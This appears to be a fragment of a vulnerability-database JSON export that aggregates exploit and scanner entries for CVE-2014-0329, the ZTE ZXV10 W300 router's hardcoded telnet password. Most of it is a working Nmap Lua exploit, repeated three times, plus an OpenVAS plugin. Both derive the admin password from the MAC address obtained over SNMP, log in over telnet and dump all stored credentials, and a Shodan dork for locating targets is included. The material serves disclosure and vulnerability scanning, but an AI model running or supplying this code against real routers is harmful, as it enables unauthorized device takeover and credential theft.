(AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n-- | Description:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\n-- | service on the device. The username is \"admin\" and the password is \"XXXXairocon\"\r\n-- | where \"XXXX\" is the last four characters of the device's MAC address. The MAC address\r\n-- | is obtainable over SNMP with community string public.\r\n-- | Disclosure date: 2014-2-3\r\n-- | Exploit results:\r\n-- | admin:1234\r\n-- | support:1234\r\n-- | admin:0E91airocon\r\n-- | References:\r\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329\r\n-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n-- |_ http://www.kb.cert.org/vuls/id/228886\r\n \r\n-- @args community SNMP community (Default: public)\r\n--\r\n---\r\n \r\n \r\nlocal DEFAULT_COMMUNITY = \"public\"\r\n \r\n \r\nhostrule = function(host)\r\n local snmp_port, telnet_port\r\n \r\n snmp_port = nmap.get_port_state(host, {number=161, protocol=\"udp\"})\r\n if not snmp_port and not (snmp_port.state == \"open\" or snmp_port.state == \"open|filtered\") then\r\n return false\r\n end\r\n \r\n telnet_port = nmap.get_port_state(host, {number=23, protocol=\"tcp\"})\r\n if not telnet_port and not telnet_port.state == \"open\" then\r\n return false\r\n end\r\n \r\n return true\r\nend\r\n \r\n \r\nlocal get_mac = function(host, community)\r\n local socket, status, response\r\n \r\n socket = nmap.new_socket(\"udp\")\r\n socket:set_timeout(5000)\r\n \r\n status, response = socket:connect(host, 161)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n local payload, request\r\n \r\n request = snmp.buildGetRequest({}, \".1.3.6.1.2.1.2.2.1.6.10000\")\r\n payload = snmp.encode(snmp.buildPacket(request, 0, community))\r\n \r\n status, response = socket:send(payload)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n status, response = socket:receive_bytes(1)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n socket:close()\r\n \r\n local result\r\n result = snmp.fetchFirst(response)\r\n \r\n if not result then\r\n return false, \"Unexpected response value.\"\r\n end\r\n \r\n return true, stdnse.tohex(result)\r\nend\r\n \r\n \r\nlocal dump_creds = function(host, user, password)\r\n local socket, status, response\r\n \r\n socket = nmap.new_socket(\"tcp\")\r\n socket:set_timeout(5000)\r\n \r\n status, response = socket:connect(host, 23)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n local payload\r\n payload = user .. \"\\r\" .. password .. \"\\rsh\\rlogin show\\rexit\\r\"\r\n \r\n status, response = socket:send(payload)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n status, response = socket:receive_buf(\"exit\", false)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n socket:close()\r\n \r\n return true, response\r\nend\r\n \r\n \r\nlocal parse_response = function(response)\r\n local index\r\n \r\n index = string.find(response, \"Username +Password +Priority\")\r\n \r\n if not index then\r\n return false, \"Unexpected response value.\"\r\n end\r\n \r\n index = string.find(response, \"\\r\\n\", index) + 2\r\n response = string.sub(response, index)\r\n \r\n local result, endl, line\r\n result = {}\r\n \r\n index = 0\r\n endl = string.find(response, \"\\r\\n\", index)\r\n \r\n while endl do\r\n line = string.sub(response, index, endl)\r\n line = string.gsub(line, \"\\r\", \"\")\r\n line = string.gsub(line, \"^ +\", \"\")\r\n line = string.gsub(line, \" +$\", \"\")\r\n line = string.gsub(line, \" +\", \" \")\r\n \r\n local user, pass, prio\r\n for user, pass, prio in string.gmatch(line, \"([^ ]+) ([^ ]+) ([^ ]+)\") do\r\n local aux = {}\r\n aux['username'] = user\r\n aux['password'] = pass\r\n aux['priority'] = prio\r\n table.insert(result, aux)\r\n end\r\n \r\n index = endl + 2\r\n endl = string.find(response, \"\\r\\n\", index)\r\n end\r\n \r\n return true, result\r\nend\r\n \r\n \r\naction = function(host)\r\n local vuln = {\r\n title = \"ZTE ZXV10 W300 router contains hardcoded credentials\",\r\n state = vulns.STATE.NOT_VULN,\r\n IDS = {CVE = 'CVE-2014-0329'},\r\n risk_factor = \"High\",\r\n scores = {\r\n CVSSv2 = \"9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\",\r\n },\r\n description = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\nservice on the device. The username is \"admin\" and the password is \"XXXXairocon\"\r\nwhere \"XXXX\" is the last four characters of the device's MAC address. The MAC address\r\nis obtainable over SNMP with community string public.]],\r\n references = {\r\n \"http://www.kb.cert.org/vuls/id/228886\",\r\n \"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\"\r\n },\r\n dates = {\r\n disclosure = {year = 2014, month = 2, day = 3},\r\n },\r\n exploit_results = {},\r\n }\r\n \r\n local community\r\n community = stdnse.get_script_args(SCRIPT_NAME .. \".community\") or DEFAULT_COMMUNITY\r\n \r\n local status, response\r\n \r\n status, response = get_mac(host, community) \r\n if not status then\r\n return response\r\n end\r\n \r\n local password\r\n password = string.upper(string.sub(response, 9)) .. \"airocon\"\r\n \r\n status, response = dump_creds(host, \"admin\", password)\r\n if not status then\r\n return response\r\n end\r\n \r\n status, response = parse_response( response )\r\n if not status then\r\n return response\r\n end\r\n \r\n vuln.state = vulns.STATE.EXPLOIT\r\n for _, data in pairs(response) do\r\n table.insert(vuln.exploit_results, data.username .. \":\" .. data.password)\r\n end\r\n \r\n return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/21875", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:25", "description": "", "published": "2014-02-09T00:00:00", "type": "packetstorm", "title": "ZTE ZXV10 W300 Hardcoded Credentials", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0329"], "modified": "2014-02-09T00:00:00", "id": "PACKETSTORM:125142", "href": "https://packetstormsecurity.com/files/125142/ZTE-ZXV10-W300-Hardcoded-Credentials.html", "sourceData": "`# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials \n# Date: 03 Feb 2014 \n# Exploit Author: Cesar Neira \n# Vendor Homepage: http://wwwen.zte.com.cn/ \n# Version: ZTE ZXV10 W300 v2.1 \n# CVE : CVE-2014-0329 \n# Dork (Shodan): Basic realm=\"index.htm\" \n# References: \nhttp://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html \n \n \nlocal nmap = require \"nmap\" \nlocal stdnse = require \"stdnse\" \nlocal snmp = require \"snmp\" \nlocal vulns = require \"vulns\" \n \ndescription = [[ \nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the \ntelnet service on the device. The username is \"admin\" and the password is \n\"XXXXairocon\" where \"XXXX\" is the last four characters of the device's MAC \naddress. The MAC address is obtainable over SNMP with community string public. \n]] \nauthor = \"Cesar Neira\" \nlicense = \"Same as Nmap--See http://nmap.org/book/man-legal.html\" \ncategories = {\"vuln\", \"exploit\", \"intrusive\"} \n \n--- \n-- \n-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org \n-- @output \n-- PORT STATE SERVICE \n-- 23/tcp open telnet \n-- 161/udp open|filtered snmp \n-- \n-- Host script results: \n-- | airocon: \n-- | VULNERABLE: \n-- | ZTE ZXV10 W300 router contains hardcoded credentials \n-- | State: VULNERABLE (Exploitable) \n-- | IDs: CVE:CVE-2014-0329 \n-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n-- | Description: \n-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet \n-- | service on the device. The username is \"admin\" and the password is \"XXXXairocon\" \n-- | where \"XXXX\" is the last four characters of the device's MAC address. The MAC address \n-- | is obtainable over SNMP with community string public. \n-- | Disclosure date: 2014-2-3 \n-- | Exploit results: \n-- | admin:1234 \n-- | support:1234 \n-- | admin:0E91airocon \n-- | References: \n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329 \n-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html \n-- |_ http://www.kb.cert.org/vuls/id/228886 \n \n-- @args community SNMP community (Default: public) \n-- \n--- \n \n \nlocal DEFAULT_COMMUNITY = \"public\" \n \n \nhostrule = function(host) \nlocal snmp_port, telnet_port \n \nsnmp_port = nmap.get_port_state(host, {number=161, protocol=\"udp\"}) \nif not snmp_port and not (snmp_port.state == \"open\" or snmp_port.state == \"open|filtered\") then \nreturn false \nend \n \ntelnet_port = nmap.get_port_state(host, {number=23, protocol=\"tcp\"}) \nif not telnet_port and not telnet_port.state == \"open\" then \nreturn false \nend \n \nreturn true \nend \n \n \nlocal get_mac = function(host, community) \nlocal socket, status, response \n \nsocket = nmap.new_socket(\"udp\") \nsocket:set_timeout(5000) \n \nstatus, response = socket:connect(host, 161) \n \nif not status then \nsocket:close() \nreturn status, response \nend \n \nlocal payload, request \n \nrequest = snmp.buildGetRequest({}, \".1.3.6.1.2.1.2.2.1.6.10000\") \npayload = snmp.encode(snmp.buildPacket(request, 0, community)) \n \nstatus, response = socket:send(payload) \n \nif not status then \nsocket:close() \nreturn status, response \nend \n \nstatus, response = socket:receive_bytes(1) \n \nif not status then \nsocket:close() \nreturn status, response \nend \n \nsocket:close() \n \nlocal result \nresult = snmp.fetchFirst(response) \n \nif not result then \nreturn false, \"Unexpected response value.\" \nend \n \nreturn true, stdnse.tohex(result) \nend \n \n \nlocal dump_creds = function(host, user, password) \nlocal socket, status, response \n \nsocket = nmap.new_socket(\"tcp\") \nsocket:set_timeout(5000) \n \nstatus, response = socket:connect(host, 23) \n \nif not status then \nsocket:close() \nreturn status, response \nend \n \nlocal payload \npayload = user .. \"\\r\" .. password .. \"\\rsh\\rlogin show\\rexit\\r\" \n \nstatus, response = socket:send(payload) \n \nif not status then \nsocket:close() \nreturn status, response \nend \n \nstatus, response = socket:receive_buf(\"exit\", false) \n \nif not status then \nsocket:close() \nreturn status, response \nend \n \nsocket:close() \n \nreturn true, response \nend \n \n \nlocal parse_response = function(response) \nlocal index \n \nindex = string.find(response, \"Username +Password +Priority\") \n \nif not index then \nreturn false, \"Unexpected response value.\" \nend \n \nindex = string.find(response, \"\\r\\n\", index) + 2 \nresponse = string.sub(response, index) \n \nlocal result, endl, line \nresult = {} \n \nindex = 0 \nendl = string.find(response, \"\\r\\n\", index) \n \nwhile endl do \nline = string.sub(response, index, endl) \nline = string.gsub(line, \"\\r\", \"\") \nline = string.gsub(line, \"^ +\", \"\") \nline = string.gsub(line, \" +$\", \"\") \nline = string.gsub(line, \" +\", \" \") \n \nlocal user, pass, prio \nfor user, pass, prio in string.gmatch(line, \"([^ ]+) ([^ ]+) ([^ ]+)\") do \nlocal aux = {} \naux['username'] = user \naux['password'] = pass \naux['priority'] = prio \ntable.insert(result, aux) \nend \n \nindex = endl + 2 \nendl = string.find(response, \"\\r\\n\", index) \nend \n \nreturn true, result \nend \n \n \naction = function(host) \nlocal vuln = { \ntitle = \"ZTE ZXV10 W300 router contains hardcoded credentials\", \nstate = vulns.STATE.NOT_VULN, \nIDS = {CVE = 'CVE-2014-0329'}, \nrisk_factor = \"High\", \nscores = { \nCVSSv2 = \"9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\", \n}, \ndescription = [[ \nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet \nservice on the device. The username is \"admin\" and the password is \"XXXXairocon\" \nwhere \"XXXX\" is the last four characters of the device's MAC address. The MAC address \nis obtainable over SNMP with community string public.]], \nreferences = { \n\"http://www.kb.cert.org/vuls/id/228886\", \n\"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\" \n}, \ndates = { \ndisclosure = {year = 2014, month = 2, day = 3}, \n}, \nexploit_results = {}, \n} \n \nlocal community \ncommunity = stdnse.get_script_args(SCRIPT_NAME .. \".community\") or DEFAULT_COMMUNITY \n \nlocal status, response \n \nstatus, response = get_mac(host, community) \nif not status then \nreturn response \nend \n \nlocal password \npassword = string.upper(string.sub(response, 9)) .. \"airocon\" \n \nstatus, response = dump_creds(host, \"admin\", password) \nif not status then \nreturn response \nend \n \nstatus, response = parse_response( response ) \nif not status then \nreturn response \nend \n \nvuln.state = vulns.STATE.EXPLOIT \nfor _, data in pairs(response) do \ntable.insert(vuln.exploit_results, data.username .. \":\" .. data.password) \nend \n \nreturn vulns.Report:new(SCRIPT_NAME, host):make_output(vuln) \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125142/zte-creds.txt"}], "openvas": [{"lastseen": "2020-03-27T19:10:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0329"], "description": "ZTE ZXV10 W300 wireless router is prone to a security-bypass\n vulnerability.", "modified": "2020-03-26T00:00:00", "published": "2014-02-10T00:00:00", "id": "OPENVAS:1361412562310103903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103903", "type": "openvas", "title": "ZTE ZXV10 W300 Wireless Router Hardcoded Credentials Security Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZTE ZXV10 W300 Wireless Router Hardcoded Credentials Security Bypass Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103903\");\n script_bugtraq_id(65310);\n script_cve_id(\"CVE-2014-0329\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-03-26T08:48:45+0000\");\n\n script_name(\"ZTE ZXV10 W300 Wireless Router Hardcoded Credentials Security Bypass Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65310\");\n\n script_tag(name:\"last_modification\", value:\"2020-03-26 08:48:45 +0000 (Thu, 26 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-10 13:47:33 +0100 (Mon, 10 Feb 2014)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_snmp_sysdesc.nasl\", \"telnetserver_detect_type_nd_version.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_require_udp_ports(\"Services/udp/snmp\", 161);\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to bypass the authentication\n mechanism and gain access to the vulnerable device.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to login into the telnet service.\");\n\n script_tag(name:\"insight\", value:\"The TELNET service on the ZTE ZXV10 W300 router 2.1.0\n has a hardcoded password ending with airocon for the admin account,\n which allows remote attackers to obtain administrative access by\n leveraging knowledge of the MAC address characters present at the\n beginning of the password.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. General solution options\n are to upgrade to a newer release, disable respective features, remove the product or replace the\n product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"summary\", value:\"ZTE ZXV10 W300 wireless router is prone to a security-bypass\n vulnerability.\");\n\n script_tag(name:\"affected\", value:\"ZTE ZXV10 W300 running firmware version 2.1.0 is vulnerable. Other\n versions may also be affected.\n\n Update 2015-08-28: At least the following models are also affected:\n\n Asus: DSL N12E\n\n Digicom: DG-5524T\n\n Observa :RTA01N\n\n PLDT: SpeedSurf 504AN\n\n ZTE: ZXV10 W300\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"telnet_func.inc\");\ninclude(\"snmp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\n\nsnmp_port = snmp_get_port(default:161);\nsysdesc = snmp_get_sysdesc(port:snmp_port);\n\ntelnet_port = 23;\nif( ! get_port_state( telnet_port ) ) exit( 0 );\n\nif( sysdesc =~ \"(ZXV|N12E|SpeedSurf|RTA|DG-)\" ) device = TRUE;\n\nif( ! device )\n{\n banner = telnet_get_banner( port:telnet_port );\n if( banner && ( \"User Access Verification\" >< banner && \"Username:\" >< banner ) || banner =~ \"(ZXV|N12E|SpeedSurf|RTA|DG-)\" ) device = TRUE;\n}\n\nif( ! device ) exit( 0 );\n\ncommunity = snmp_get_community( port:snmp_port );\nif( ! community ) community = \"public\";\n\nSNMP_BASE = 38;\nCOMMUNITY_SIZE = strlen( community );\nsz = COMMUNITY_SIZE % 256;\n\nlen = SNMP_BASE + COMMUNITY_SIZE;\n\nfor( i = 0; i < 3; i++ )\n{\n soc = open_sock_udp( snmp_port );\n if( ! soc ) exit( 0 );\n # snmpget -v1 -c <community> <target> .1.3.6.1.2.1.2.2.1.6.10000\n sendata = raw_string(0x30,len,0x02,0x01,i,0x04,sz) +\n community +\n raw_string(0xa0,0x1f,0x02,0x04,0x2d,0xc7,0xb1,0x92,\n 0x02,0x01,0x00,0x02,0x01,0x00,0x30,0x11,\n 0x30,0x0f,0x06,0x0b,0x2b,0x06,0x01,0x02,\n 0x01,0x02,0x02,0x01,0x06,0xce,0x10,0x05,\n 00);\n\n send( socket:soc, data:sendata );\n result = recv( socket:soc, length:400, timeout:1 );\n close( soc );\n\n if( ! result || ord( result[0] ) != 48 )continue;\n\n res = hexstr( result );\n mac = toupper( substr( res, ( strlen( res ) - 4 ) ) );\n\n if( ! mac || strlen( mac ) != 4 ) exit( 0);\n\n pass = mac + 'airocon';\n\n soc = open_sock_tcp (telnet_port );\n if( ! soc ) exit( 0 );\n recv = telnet_negotiate( socket:soc );\n\n send( socket:soc, data: 'admin\\r\\n');\n recv = recv( socket:soc, length:2048);\n if( \"Password:\" >!< recv ) exit( 0 );\n\n send( socket:soc, data: pass + '\\r\\n');\n recv = recv( socket:soc, length:2048);\n if( \"$\" >!< recv ) exit( 99 );\n\n send( socket:soc, data: 'sh\\r\\n');\n recv = recv( socket:soc, length:2048);\n if( \"ADSL#\" >!< recv ) exit( 0 );\n\n send( socket:soc, data: 'login show\\r\\n');\n recv = recv( socket:soc, length:2048);\n close( soc );\n\n if( \"Username\" >< recv && \"Password\" >< recv && \"Priority\" >< recv )\n {\n report = 'By using \"admin\" as username and \"' + pass + '\" as password\\n' +\n 'it was possible to login and to obtain the following credentials:\\n' +\n recv + '\\n';\n security_message( port: telnet_port, data: report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:36:17", "description": "CVE ID\uff1aCVE-2014-0329\r\n\r\nZTE ZXV10 W300 Router\u662f\u4e2d\u56fd\u4e2d\u5174\u901a\u8baf\uff08ZTE\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u65e0\u7ebf\u8def\u7531\u5668\u4ea7\u54c1\u3002 \r\n\r\nZTE ZXV10 W300\u8def\u7531\u56682.1.0\u7248\u672c\u4e0a\u7684TELNET\u670d\u52a1\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u5b89\u88c5\u4f7f\u7528\u9ed8\u8ba4\u7684\u786c\u7f16\u7801\u51ed\u8bc1\uff0c\u5c06admin\u5e10\u6237\u5bc6\u7801\u2018XXXXairocon\u2019\u4e2d\u7684\u524d\u56db\u4f4d\u8bbe\u7f6e\u4e3aMAC\u5730\u5740\u540e\u56db\u4f4d\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5df2\u77e5\u7684\u5bc6\u7801\u5229\u7528\u8be5\u6f0f\u6d1e\u83b7\u53d6\u7ba1\u7406\u8bbf\u95ee\u6743\u9650\u3002\n0\nZTE ZXV10 W300 Router\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nZTE\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a \r\n\r\nhttp://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html", "published": "2014-02-11T00:00:00", "type": "seebug", "title": "ZTE ZXV10 W300 Router\u4fe1\u4efb\u7ba1\u7406\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0329"], "modified": "2014-02-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61413", "id": "SSV:61413", "sourceData": "\n # Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials\r\n# Date: 03 Feb 2014\r\n# Exploit Author: Cesar Neira\r\n# Vendor Homepage: http://wwwen.zte.com.cn/\r\n# Version: ZTE ZXV10 W300 v2.1\r\n# CVE : CVE-2014-0329\r\n# Dork (Shodan): Basic realm="index.htm"\r\n# References:\r\nhttp://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n \r\n \r\nlocal nmap = require "nmap"\r\nlocal stdnse = require "stdnse"\r\nlocal snmp = require "snmp"\r\nlocal vulns = require "vulns"\r\n \r\ndescription = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the\r\ntelnet service on the device. The username is "admin" and the password is\r\n"XXXXairocon" where "XXXX" is the last four characters of the device's MAC\r\naddress. The MAC address is obtainable over SNMP with community string public.\r\n]]\r\nauthor = "Cesar Neira"\r\nlicense = "Same as Nmap--See http://nmap.org/book/man-legal.html"\r\ncategories = {"vuln", "exploit", "intrusive"}\r\n \r\n---\r\n--\r\n-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 23/tcp open telnet\r\n-- 161/udp open|filtered snmp\r\n-- \r\n-- Host script results:\r\n-- | airocon: \r\n-- | VULNERABLE:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials\r\n-- | State: VULNERABLE (Exploitable)\r\n-- | IDs: CVE:CVE-2014-0329\r\n-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n-- | Description:\r\n-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\n-- | service on the device. The username is "admin" and the password is "XXXXairocon"\r\n-- | where "XXXX" is the last four characters of the device's MAC address. The MAC address\r\n-- | is obtainable over SNMP with community string public.\r\n-- | Disclosure date: 2014-2-3\r\n-- | Exploit results:\r\n-- | admin:1234\r\n-- | support:1234\r\n-- | admin:0E91airocon\r\n-- | References:\r\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329\r\n-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html\r\n-- |_ http://www.kb.cert.org/vuls/id/228886\r\n \r\n-- @args community SNMP community (Default: public)\r\n--\r\n---\r\n \r\n \r\nlocal DEFAULT_COMMUNITY = "public"\r\n \r\n \r\nhostrule = function(host)\r\n local snmp_port, telnet_port\r\n \r\n snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})\r\n if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then\r\n return false\r\n end\r\n \r\n telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})\r\n if not telnet_port and not telnet_port.state == "open" then\r\n return false\r\n end\r\n \r\n return true\r\nend\r\n \r\n \r\nlocal get_mac = function(host, community)\r\n local socket, status, response\r\n \r\n socket = nmap.new_socket("udp")\r\n socket:set_timeout(5000)\r\n \r\n status, response = socket:connect(host, 161)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n local payload, request\r\n \r\n request = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")\r\n payload = snmp.encode(snmp.buildPacket(request, 0, community))\r\n \r\n status, response = socket:send(payload)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n status, response = socket:receive_bytes(1)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n socket:close()\r\n \r\n local result\r\n result = snmp.fetchFirst(response)\r\n \r\n if not result then\r\n return false, "Unexpected response value."\r\n end\r\n \r\n return true, stdnse.tohex(result)\r\nend\r\n \r\n \r\nlocal dump_creds = function(host, user, password)\r\n local socket, status, response\r\n \r\n socket = nmap.new_socket("tcp")\r\n socket:set_timeout(5000)\r\n \r\n status, response = socket:connect(host, 23)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n local payload\r\n payload = user .. "\\r" .. password .. "\\rsh\\rlogin show\\rexit\\r"\r\n \r\n status, response = socket:send(payload)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n status, response = socket:receive_buf("exit", false)\r\n \r\n if not status then\r\n socket:close()\r\n return status, response\r\n end\r\n \r\n socket:close()\r\n \r\n return true, response\r\nend\r\n \r\n \r\nlocal parse_response = function(response)\r\n local index\r\n \r\n index = string.find(response, "Username +Password +Priority")\r\n \r\n if not index then\r\n return false, "Unexpected response value."\r\n end\r\n \r\n index = string.find(response, "\\r\\n", index) + 2\r\n response = string.sub(response, index)\r\n \r\n local result, endl, line\r\n result = {}\r\n \r\n index = 0\r\n endl = string.find(response, "\\r\\n", index)\r\n \r\n while endl do\r\n line = string.sub(response, index, endl)\r\n line = string.gsub(line, "\\r", "")\r\n line = string.gsub(line, "^ +", "")\r\n line = string.gsub(line, " +$", "")\r\n line = string.gsub(line, " +", " ")\r\n \r\n local user, pass, prio\r\n for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do\r\n local aux = {}\r\n aux['username'] = user\r\n aux['password'] = pass\r\n aux['priority'] = prio\r\n table.insert(result, aux)\r\n end\r\n \r\n index = endl + 2\r\n endl = string.find(response, "\\r\\n", index)\r\n end\r\n \r\n return true, result\r\nend\r\n \r\n \r\naction = function(host)\r\n local vuln = {\r\n title = "ZTE ZXV10 W300 router contains hardcoded credentials",\r\n state = vulns.STATE.NOT_VULN,\r\n IDS = {CVE = 'CVE-2014-0329'},\r\n risk_factor = "High",\r\n scores = {\r\n CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",\r\n },\r\n description = [[\r\nZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet\r\nservice on the device. The username is "admin" and the password is "XXXXairocon"\r\nwhere "XXXX" is the last four characters of the device's MAC address. The MAC address\r\nis obtainable over SNMP with community string public.]],\r\n references = {\r\n "http://www.kb.cert.org/vuls/id/228886",\r\n "http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"\r\n },\r\n dates = {\r\n disclosure = {year = 2014, month = 2, day = 3},\r\n },\r\n exploit_results = {},\r\n }\r\n \r\n local community\r\n community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY\r\n \r\n local status, response\r\n \r\n status, response = get_mac(host, community) \r\n if not status then\r\n return response\r\n end\r\n \r\n local password\r\n password = string.upper(string.sub(response, 9)) .. "airocon"\r\n \r\n status, response = dump_creds(host, "admin", password)\r\n if not status then\r\n return response\r\n end\r\n \r\n status, response = parse_response( response )\r\n if not status then\r\n return response\r\n end\r\n \r\n vuln.state = vulns.STATE.EXPLOIT\r\n for _, data in pairs(response) do\r\n table.insert(vuln.exploit_results, data.username .. ":" .. data.password)\r\n end\r\n \r\n return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61413", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-01-18T14:28:51", "description": "Nessus was able to login to the remote device using a known hard-coded password (prepended with a portion of the device's MAC address obtained from an SNMP request) for the admin account. Attackers can exploit this vulnerability to gain full control of the device.", "cvss3": {}, "published": "2014-03-05T00:00:00", "type": "nessus", "title": "ZTE ZXV10 W300 Wireless Router Hard-coded Password", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 